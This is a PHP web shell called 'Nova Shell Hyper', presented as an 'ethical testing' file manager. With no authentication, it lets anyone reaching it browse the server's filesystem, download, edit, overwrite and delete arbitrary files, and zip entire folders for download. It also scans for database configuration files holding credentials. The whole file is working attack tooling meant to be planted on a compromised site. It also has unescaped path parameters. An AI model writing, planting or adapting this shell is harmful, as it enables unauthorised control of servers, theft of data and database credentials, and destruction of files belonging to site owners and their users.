<?php
// Nova Shell Hyper - Secure File Manager (Ethical Testing Only)
// Version: Lite Advanced - GUI + Zip + SQL config scan + No Login

error_reporting(0);
set_time_limit(0);

function humanSize($bytes) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    for ($i = 0; $bytes >= 1024 && $i < 4; $i++) $bytes /= 1024;
    return round($bytes, 2) . ' ' . $units[$i];
}

function listDir($path) {
    $items = scandir($path);
    echo "<h2>Index of $path</h2><table><tr><th>Name</th><th>Size</th><th>Actions</th></tr>";
    foreach ($items as $item) {
        if ($item == "." || $item == "..") continue;
        $full = "$path/$item";
        echo "<tr><td><a href='?path=$full'>" . htmlspecialchars($item) . "</a></td>";
        echo "<td>" . (is_dir($full) ? '-' : humanSize(filesize($full))) . "</td>";
        echo "<td><a href='?edit=$full'>Edit</a> | <a href='?delete=$full'>Delete</a> | <a href='?download=$full'>Download</a></td></tr>";
    }
    echo "</table>";
}

function zipFolder($folder, $zipFile) {
    $zip = new ZipArchive();
    if ($zip->open($zipFile, ZipArchive::CREATE) === TRUE) {
        $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder), RecursiveIteratorIterator::LEAVES_ONLY);
        foreach ($files as $name => $file) {
            if (!$file->isDir()) {
                $filePath = $file->getRealPath();
                $relativePath = substr($filePath, strlen($folder) + 1);
                $zip->addFile($filePath, $relativePath);
            }
        }
        $zip->close();
        return true;
    }
    return false;
}

function findSQLConfigs($path) {
    $found = [];
    $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path));
    foreach ($rii as $file) {
        if (!$file->isDir() && preg_match('/(config|database).*\.php$/i', $file->getFilename())) {
            $contents = file_get_contents($file->getPathname());
            if (strpos($contents, 'DB_') !== false || strpos($contents, 'mysql') !== false) {
                $found[] = $file->getPathname();
            }
        }
    }
    return $found;
}

$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();
if (isset($_GET['download']) && file_exists($_GET['download'])) {
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($_GET['download']) . '"');
    readfile($_GET['download']);
    exit;
} elseif (isset($_GET['edit']) && file_exists($_GET['edit'])) {
    if (isset($_POST['save'])) {
        file_put_contents($_GET['edit'], $_POST['content']);
        echo "<p>File saved.</p>";
    }
    $content = htmlspecialchars(file_get_contents($_GET['edit']));
    echo "<form method='POST'><textarea name='content' style='width:100%;height:400px;'>$content</textarea><br><input type='submit' name='save' value='Save'></form>";
    exit;
} elseif (isset($_GET['delete']) && file_exists($_GET['delete'])) {
    unlink($_GET['delete']);
    header("Location: ?path=" . dirname($_GET['delete']));
    exit;
} elseif (isset($_GET['zip']) && is_dir($_GET['zip'])) {
    $zipPath = $_GET['zip'] . '.zip';
    if (zipFolder($_GET['zip'], $zipPath)) {
        echo "<p>Zip created: <a href='?download=$zipPath'>$zipPath</a></p>";
    } else {
        echo "<p>Zip failed.</p>";
    }
    exit;
} elseif (isset($_GET['sqlscan'])) {
    $configs = findSQLConfigs($cwd);
    echo "<h2>Found SQL Configs:</h2><ul>";
    foreach ($configs as $config) echo "<li>$config</li>";
    echo "</ul>";
    exit;
}

// HTML Interface
?><!DOCTYPE html><html><head><title>Nova Shell Hyper</title>
<style>
body { font-family: sans-serif; background: #111; color: #eee; padding: 20px; }
a { color: #6cf; text-decoration: none; }
table { width: 100%; border-collapse: collapse; }
th, td { padding: 8px; border: 1px solid #333; }
textarea { background: #000; color: #0f0; font-family: monospace; }
</style></head><body>
<h1>Nova Shell Hyper</h1>
<a href='?path=<?php echo $cwd; ?>&zip=<?php echo $cwd; ?>'>[Zip This Folder]</a> |
<a href='?path=<?php echo $cwd; ?>&sqlscan=1'>[Find SQL Configs]</a><br><br>
<?php listDir($cwd); ?>
</body></html>